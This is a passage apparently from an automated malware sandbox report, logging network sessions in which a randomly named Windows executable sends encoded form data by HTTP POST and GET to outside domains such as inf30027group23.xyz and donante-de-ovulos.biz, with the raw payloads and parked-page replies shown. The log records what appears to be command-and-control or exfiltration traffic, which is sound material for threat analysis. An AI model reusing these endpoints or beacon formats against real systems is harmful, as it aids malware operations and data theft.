26	192.168.2.6	49998	221.121.144.149	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:30.132349014 CEST	698	OUT	POST /3ycg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.inf30027group23.xyz Origin: http://www.inf30027group23.xyz Connection: close Cache-Control: no-cache Content-Length: 233 Content-Type: application/x-www-form-urlencoded Referer: http://www.inf30027group23.xyz/3ycg/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 6b 42 7a 64 33 6b 6a 45 67 66 77 75 59 4f 50 7a 49 5a 6e 78 31 6a 6e 4d 4e 69 53 62 49 7a 59 77 35 4a 33 52 42 77 58 5a 67 6d 69 37 4f 34 67 71 33 43 4a 41 53 43 72 66 38 34 70 6d 74 72 4e 41 35 4d 64 6d 69 2f 37 56 6c 4f 64 48 65 57 70 2b 58 73 77 76 78 56 41 47 43 71 72 5a 62 79 6a 65 59 68 2f 38 54 61 4e 72 37 63 51 63 2f 6a 50 63 72 49 38 38 38 72 7a 78 4f 65 69 67 78 35 6f 53 6c 59 2f 74 32 53 38 33 52 71 73 5a 72 79 38 43 77 53 66 66 62 45 4d 69 63 51 4d 32 34 52 64 2f 72 6b 61 70 79 76 48 59 4a 5a 56 78 45 70 6a 4a 65 53 32 6c 4a 72 33 30 76 43 69 4b 36 31 53 45 62 46 6b 67 33 64 31 46 4b 48 6e 32 45 43 72 32 74 74 35 5a 41 66 44 4b 54 68 46 38 38 63 48 30 59 41 3d 3d Data Ascii: kT9p=kBzd3kjEgfwuYOPzIZnx1jnMNiSbIzYw5J3RBwXZgmi7O4gq3CJASCrf84pmtrNA5Mdmi/7VlOdHeWp+XswvxVAGCqrZbyjeYh/8TaNr7cQc/jPcrI888rzxOeigx5oSlY/t2S83RqsZry8CwSffbEMicQM24Rd/rkapyvHYJZVxEpjJeS2lJr30vCiK61SEbFkg3d1FKHn2ECr2tt5ZAfDKThF88cH0YA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49999	221.121.144.149	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:32.685199022 CEST	1711	OUT	POST /3ycg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.inf30027group23.xyz Origin: http://www.inf30027group23.xyz Connection: close Cache-Control: no-cache Content-Length: 1245 Content-Type: application/x-www-form-urlencoded Referer: http://www.inf30027group23.xyz/3ycg/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 6b 42 7a 64 33 6b 6a 45 67 66 77 75 59 4f 50 7a 49 5a 6e 78 31 6a 6e 4d 4e 69 53 62 49 7a 59 77 35 4a 33 52 42 77 58 5a 67 6e 32 37 4e 4b 6f 71 6c 6a 4a 41 56 43 72 66 31 59 70 6a 74 72 4e 6e 35 4d 6c 36 69 2f 2f 76 6c 49 5a 48 63 7a 31 2b 56 59 63 76 2f 6c 41 47 64 36 72 61 66 79 69 61 59 68 76 34 54 61 64 72 37 63 51 63 2f 6c 4c 63 73 61 45 38 78 4c 7a 32 5a 75 69 61 6e 35 6f 32 6c 59 6e 39 32 53 6f 42 52 37 4d 5a 6c 79 4d 43 6a 33 4c 66 42 45 4d 6b 66 51 4e 6c 34 52 51 68 72 6b 57 55 79 76 7a 69 4a 61 4a 78 42 76 65 6b 61 6a 7a 39 61 4a 37 35 75 44 71 4c 68 31 53 7a 52 46 77 46 32 75 46 34 4a 6e 66 39 46 6c 33 49 6c 73 38 55 48 63 48 2f 51 6e 30 67 30 73 4b 54 4e 71 47 78 35 51 52 66 79 61 44 73 5a 71 58 38 6d 31 74 56 77 5a 6c 31 50 4c 42 34 55 55 65 33 48 65 62 6a 42 67 73 44 68 41 43 78 4c 48 54 33 77 76 43 74 71 61 4a 70 62 69 4f 6f 37 79 64 72 49 49 78 56 7a 57 63 65 54 54 41 33 56 45 4a 76 56 38 5a 71 4d 74 4a 38 34 72 74 4b 65 65 33 44 6d 51 52 69 77 56 57 37 74 4f 6c 34 44 [TRUNCATED] Data Ascii: kT9p=kBzd3kjEgfwuYOPzIZnx1jnMNiSbIzYw5J3RBwXZgn27NKoqljJAVCrf1YpjtrNn5Ml6i//vlIZHcz1+VYcv/lAGd6rafyiaYhv4Tadr7cQc/lLcsaE8xLz2Zuian5o2lYn92SoBR7MZlyMCj3LfBEMkfQNl4RQhrkWUyvziJaJxBvekajz9aJ75uDqLh1SzRFwF2uF4Jnf9Fl3Ils8UHcH/Qn0g0sKTNqGx5QRfyaDsZqX8m1tVwZl1PLB4UUe3HebjBgsDhACxLHT3wvCtqaJpbiOo7ydrIIxVzWceTTA3VEJvV8ZqMtJ84rtKee3DmQRiwVW7tOl4DXWH+3rvTrB5qVtpw2L53tdf4ojKOk8bPLSqGst/S67zZr95vtDqWKT9rylGfwvhanBiG1NMH4WjAEvHieQpOdUTxBk3iwGa50vH7ng0SwHk3lDAONYDfZnPvstlw8pp8swvH/cWurY1XDMDhglT11sZUuaFw+yCk8Y4YQUQVtyfM/MLP8Mvs0ZvCgDVVPbUW+2Ek+2kGb3M3fKu9XmHc4HQgc4T55Joh32DAyf5ER+ZJlMeMx5ebSZREyDeZ0dkLLNw4Wq76TStaVWCtS8HZ6zR2ssO62jKUZ/EmXKplWNxYp2Es+qZlxEXDtDaQqSv3GKjmpd2buWN1dKOxFThYN/MFhCv0fmA0U5lXIYAE0pIO+Wz1MttzznKuxDutW5z8pRuO6P2MMgtEyP7e7DkF+mprvlyY6xeiU3foQWqm7C/8x0O6fKAPrNRamszyNPno19pYwabTo/Bjxf2tWQae3DYLQbyytGRwXeenJ537dyNLKBO5WnzlAz2Q4ZHJLC3/vXsXC9V46CfaGkTKQDitx+zitAn1onMkH9mYXkgqJn6q6LRuZ84Y1YYxOzCTWdeoroPFquaOI32SmQAWdMxv2t2hvcQdL5+klYzMss80sN2CO5IXTaQTxtBHynlFx+DtZryEU7soVx9sUULrV5PHKcPp7l2Zxg3zBH [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	50000	221.121.144.149	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:35.228218079 CEST	413	OUT	GET /3ycg/?kT9p=pDb90QysyaZySbP/Lb/85VXpHjKeZwoE0p/ODTrpnAu3DfEgpB0uRxX+6J53waNs/qZsvobulOY9cjRmYN5o5DJXVIa4VTjeIROacIJgysQWwkDrvblS6LDkWdy22I4DlZH18HE=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.inf30027group23.xyz Connection: close User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Oct 22, 2024 05:40:36.621258974 CEST	640	IN	HTTP/1.1 301 Moved Permanently Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://inf30027group23.xyz/3ycg/?kT9p=pDb90QysyaZySbP/Lb/85VXpHjKeZwoE0p/ODTrpnAu3DfEgpB0uRxX+6J53waNs/qZsvobulOY9cjRmYN5o5DJXVIa4VTjeIROacIJgysQWwkDrvblS6LDkWdy22I4DlZH18HE=&in1Hf=rx3dZnMxlRvDbR x-litespeed-cache-control: public,max-age=3600 x-litespeed-tag: 3da_HTTP.404,3da_HTTP.301,3da_404,3da_URL.aa729817747d5c0f1a8ac4aa10bef22d,3da_ content-length: 0 date: Tue, 22 Oct 2024 03:40:37 GMT server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	50001	199.59.243.227	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:41.909851074 CEST	680	OUT	POST /g3wl/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.donante-de-ovulos.biz Origin: http://www.donante-de-ovulos.biz Connection: close Cache-Control: no-cache Content-Length: 209 Content-Type: application/x-www-form-urlencoded Referer: http://www.donante-de-ovulos.biz/g3wl/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 34 41 67 57 6f 53 67 69 4f 4e 74 36 50 4a 38 58 78 6b 61 69 34 74 52 34 71 75 2f 47 74 54 36 61 63 4e 38 6f 76 66 6c 31 58 61 46 76 78 69 34 63 4f 37 67 65 4f 53 4e 6d 6f 4f 2b 6d 39 39 33 6d 79 59 2b 56 41 77 61 47 73 66 4f 39 41 77 72 4f 30 41 59 2f 76 78 49 32 78 4b 68 6b 65 73 74 50 34 42 41 61 6e 77 76 47 58 4f 73 37 76 2f 61 47 43 4b 68 38 71 76 43 66 71 5a 69 43 35 34 43 46 55 46 6e 6c 46 4e 59 4c 55 4f 61 50 55 69 43 6f 54 76 66 4d 75 64 36 6d 35 7a 5a 6c 45 6b 72 32 49 78 64 48 57 37 70 61 43 49 70 41 46 53 71 4f 41 74 61 53 31 33 63 41 43 52 4d 51 39 41 34 45 5a 6c 70 41 73 36 52 36 6c 43 5a 73 Data Ascii: kT9p=4AgWoSgiONt6PJ8Xxkai4tR4qu/GtT6acN8ovfl1XaFvxi4cO7geOSNmoO+m993myY+VAwaGsfO9AwrO0AY/vxI2xKhkestP4BAanwvGXOs7v/aGCKh8qvCfqZiC54CFUFnlFNYLUOaPUiCoTvfMud6m5zZlEkr2IxdHW7paCIpAFSqOAtaS13cACRMQ9A4EZlpAs6R6lCZs
Oct 22, 2024 05:40:42.522188902 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 22 Oct 2024 03:40:41 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: d9fb7421-c61d-4614-bbd2-7703015ef4a6 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HhPxMOTNN9+LfwNCFp/pRD3amcHu04k1D6v61kEEG+z4aAaqzcg4OXgMaW4cSbHroZq6NuSUazFs7chqMn6VlQ== set-cookie: parking_session=d9fb7421-c61d-4614-bbd2-7703015ef4a6; expires=Tue, 22 Oct 2024 03:55:42 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 68 50 78 4d 4f 54 4e 4e 39 2b 4c 66 77 4e 43 46 70 2f 70 52 44 33 61 6d 63 48 75 30 34 6b 31 44 36 76 36 31 6b 45 45 47 2b 7a 34 61 41 61 71 7a 63 67 34 4f 58 67 4d 61 57 34 63 53 62 48 72 6f 5a 71 36 4e 75 53 55 61 7a 46 73 37 63 68 71 4d 6e 36 56 6c 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HhPxMOTNN9+LfwNCFp/pRD3amcHu04k1D6v61kEEG+z4aAaqzcg4OXgMaW4cSbHroZq6NuSUazFs7chqMn6VlQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 22, 2024 05:40:42.522268057 CEST	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDlmYjc0MjEtYzYxZC00NjE0LWJiZDItNzcwMzAxNWVmNGE2IiwicGFnZV90aW1lIjoxNzI5NTY4ND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	50002	199.59.243.227	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:44.464335918 CEST	704	OUT	POST /g3wl/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.donante-de-ovulos.biz Origin: http://www.donante-de-ovulos.biz Connection: close Cache-Control: no-cache Content-Length: 233 Content-Type: application/x-www-form-urlencoded Referer: http://www.donante-de-ovulos.biz/g3wl/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 34 41 67 57 6f 53 67 69 4f 4e 74 36 4f 70 4d 58 30 44 32 69 74 39 52 37 70 75 2f 47 6b 7a 36 6b 63 4e 34 6f 76 62 31 6c 57 73 31 76 78 47 38 63 50 2b 41 65 50 53 4e 6d 39 2b 2b 5a 2b 4e 33 76 79 59 7a 71 41 78 6d 47 73 62 65 39 41 31 58 4f 30 78 59 38 39 78 4a 51 33 4b 68 6d 47 4d 74 50 34 42 41 61 6e 77 37 67 58 4f 30 37 73 50 71 47 51 2f 56 2f 32 66 43 63 6a 35 69 43 72 49 44 4d 55 46 6e 4c 46 4d 45 68 55 4e 79 50 55 67 61 6f 54 37 44 44 30 4e 36 6f 31 6a 59 45 50 56 43 71 48 78 30 51 49 74 78 36 56 35 4d 68 4e 45 72 55 63 65 61 78 6e 6e 38 43 43 54 55 69 39 67 34 75 62 6c 52 41 2b 74 64 64 71 32 38 50 57 36 34 55 42 57 65 79 66 4e 54 33 7a 68 33 37 49 44 36 4d 77 51 3d 3d Data Ascii: kT9p=4AgWoSgiONt6OpMX0D2it9R7pu/Gkz6kcN4ovb1lWs1vxG8cP+AePSNm9++Z+N3vyYzqAxmGsbe9A1XO0xY89xJQ3KhmGMtP4BAanw7gXO07sPqGQ/V/2fCcj5iCrIDMUFnLFMEhUNyPUgaoT7DD0N6o1jYEPVCqHx0QItx6V5MhNErUceaxnn8CCTUi9g4ublRA+tddq28PW64UBWeyfNT3zh37ID6MwQ==
Oct 22, 2024 05:40:45.114386082 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 22 Oct 2024 03:40:44 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: db7d557c-e50d-4033-aaf5-ff545f0367fc cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HhPxMOTNN9+LfwNCFp/pRD3amcHu04k1D6v61kEEG+z4aAaqzcg4OXgMaW4cSbHroZq6NuSUazFs7chqMn6VlQ== set-cookie: parking_session=db7d557c-e50d-4033-aaf5-ff545f0367fc; expires=Tue, 22 Oct 2024 03:55:45 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 68 50 78 4d 4f 54 4e 4e 39 2b 4c 66 77 4e 43 46 70 2f 70 52 44 33 61 6d 63 48 75 30 34 6b 31 44 36 76 36 31 6b 45 45 47 2b 7a 34 61 41 61 71 7a 63 67 34 4f 58 67 4d 61 57 34 63 53 62 48 72 6f 5a 71 36 4e 75 53 55 61 7a 46 73 37 63 68 71 4d 6e 36 56 6c 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HhPxMOTNN9+LfwNCFp/pRD3amcHu04k1D6v61kEEG+z4aAaqzcg4OXgMaW4cSbHroZq6NuSUazFs7chqMn6VlQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 22, 2024 05:40:45.114456892 CEST	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGI3ZDU1N2MtZTUwZC00MDMzLWFhZjUtZmY1NDVmMDM2N2ZjIiwicGFnZV90aW1lIjoxNzI5NTY4ND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	50003	199.59.243.227	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:47.007349014 CEST	1717	OUT	POST /g3wl/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.donante-de-ovulos.biz Origin: http://www.donante-de-ovulos.biz Connection: close Cache-Control: no-cache Content-Length: 1245 Content-Type: application/x-www-form-urlencoded Referer: http://www.donante-de-ovulos.biz/g3wl/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 34 41 67 57 6f 53 67 69 4f 4e 74 36 4f 70 4d 58 30 44 32 69 74 39 52 37 70 75 2f 47 6b 7a 36 6b 63 4e 34 6f 76 62 31 6c 57 73 39 76 78 31 6b 63 4f 66 41 65 4d 53 4e 6d 68 75 2b 63 2b 4e 32 74 79 59 72 75 41 78 72 35 73 64 43 39 42 51 62 4f 32 44 77 38 33 78 4a 51 36 71 68 6c 65 73 74 67 34 46 73 47 6e 77 72 67 58 4f 30 37 73 4e 79 47 48 36 68 2f 30 66 43 66 71 5a 6a 4e 35 34 44 6b 55 45 43 32 46 4d 41 62 56 39 53 50 55 41 4b 6f 63 75 66 44 73 64 37 4f 32 6a 59 6d 50 56 65 44 48 33 51 63 49 74 74 41 56 34 30 68 64 79 6a 49 47 73 75 4d 6b 6e 63 4e 44 54 41 31 2b 58 67 34 63 32 35 42 31 38 56 42 68 33 39 68 56 73 67 6f 46 67 44 56 49 39 54 58 2f 57 79 34 42 77 57 4a 76 54 62 2f 47 4c 75 62 50 6f 54 52 59 6e 35 2b 74 42 78 70 70 70 52 6d 77 71 70 30 76 6f 44 77 41 52 66 64 4d 6d 4d 34 6d 38 6a 6b 37 43 32 6d 56 78 58 34 6d 67 75 58 5a 31 2b 79 68 63 4a 66 69 56 36 5a 61 71 75 43 4d 31 45 74 39 53 75 42 6d 7a 44 79 47 74 79 6e 46 59 76 7a 47 46 51 4f 42 32 77 62 31 45 41 39 56 73 66 46 43 [TRUNCATED] Data Ascii: kT9p=4AgWoSgiONt6OpMX0D2it9R7pu/Gkz6kcN4ovb1lWs9vx1kcOfAeMSNmhu+c+N2tyYruAxr5sdC9BQbO2Dw83xJQ6qhlestg4FsGnwrgXO07sNyGH6h/0fCfqZjN54DkUEC2FMAbV9SPUAKocufDsd7O2jYmPVeDH3QcIttAV40hdyjIGsuMkncNDTA1+Xg4c25B18VBh39hVsgoFgDVI9TX/Wy4BwWJvTb/GLubPoTRYn5+tBxpppRmwqp0voDwARfdMmM4m8jk7C2mVxX4mguXZ1+yhcJfiV6ZaquCM1Et9SuBmzDyGtynFYvzGFQOB2wb1EA9VsfFCdhUUhqzc0NbQI+xC7BXZmWDsGwgrmFoRNbyyYQsvWHbOqMgIg/m0+1YHibLHSfW/mwTngCaLn5pLf2rKTTOJBEClRH87ih8umG4Xx0d/irlo2522rWSTnVx4xBBsFA7doPXZZQBZUanWAKY6vxCiTaM4jfYEIexc1LP90/tHZT13Kyk4K8A/7DqJ46WqKmEROuTfVGYaDEdo9eDNlIhckClY/7GKGlkE5V0DWRRtctOLf6v8NtuRfSsmfzrvECgxcUhC/nG5fVWXhves+iXmhEs3//iLXBT9RD2rECEFCgdTRpsCOt1QUFbiOVCCg74i3sRIzHc1uJw6lss1WhdCA68erTmbUURLOu4a5RpBLlEfFIoz612YodNF4K4Dxi1CY8iz8L/e6GkFmgOkti74dt5UUFFgzkKUBPadKvq0bZDmyyeZtswe4NMv8/oN9eHB52PR3mu2jVJaOFYbmxl4rYXN+VgZs/EOldxvVA/p1ipHHwqRNmuyJDP9ejal7Czt3FGPPLrLQULq2uvgMsXOh6Wy1euWDpGsCEJCNHMXv7g9+d4G+aDfSTRMyd6zonsw0nBjLcNR1x2m2FeFzQWxpO3p7a6Q+bhX24+Tfea0Ew31LrrrHtKMaXalrb82jj1ZHQbEv9F/GqkfFetuGERLvSvxF8J8LZK8YY [TRUNCATED]
Oct 22, 2024 05:40:47.625760078 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 22 Oct 2024 03:40:46 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: e0c07cae-767a-49c6-973e-a3fed0b92812 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HhPxMOTNN9+LfwNCFp/pRD3amcHu04k1D6v61kEEG+z4aAaqzcg4OXgMaW4cSbHroZq6NuSUazFs7chqMn6VlQ== set-cookie: parking_session=e0c07cae-767a-49c6-973e-a3fed0b92812; expires=Tue, 22 Oct 2024 03:55:47 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 68 50 78 4d 4f 54 4e 4e 39 2b 4c 66 77 4e 43 46 70 2f 70 52 44 33 61 6d 63 48 75 30 34 6b 31 44 36 76 36 31 6b 45 45 47 2b 7a 34 61 41 61 71 7a 63 67 34 4f 58 67 4d 61 57 34 63 53 62 48 72 6f 5a 71 36 4e 75 53 55 61 7a 46 73 37 63 68 71 4d 6e 36 56 6c 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HhPxMOTNN9+LfwNCFp/pRD3amcHu04k1D6v61kEEG+z4aAaqzcg4OXgMaW4cSbHroZq6NuSUazFs7chqMn6VlQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 22, 2024 05:40:47.625823021 CEST	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTBjMDdjYWUtNzY3YS00OWM2LTk3M2UtYTNmZWQwYjkyODEyIiwicGFnZV90aW1lIjoxNzI5NTY4ND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	50004	199.59.243.227	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
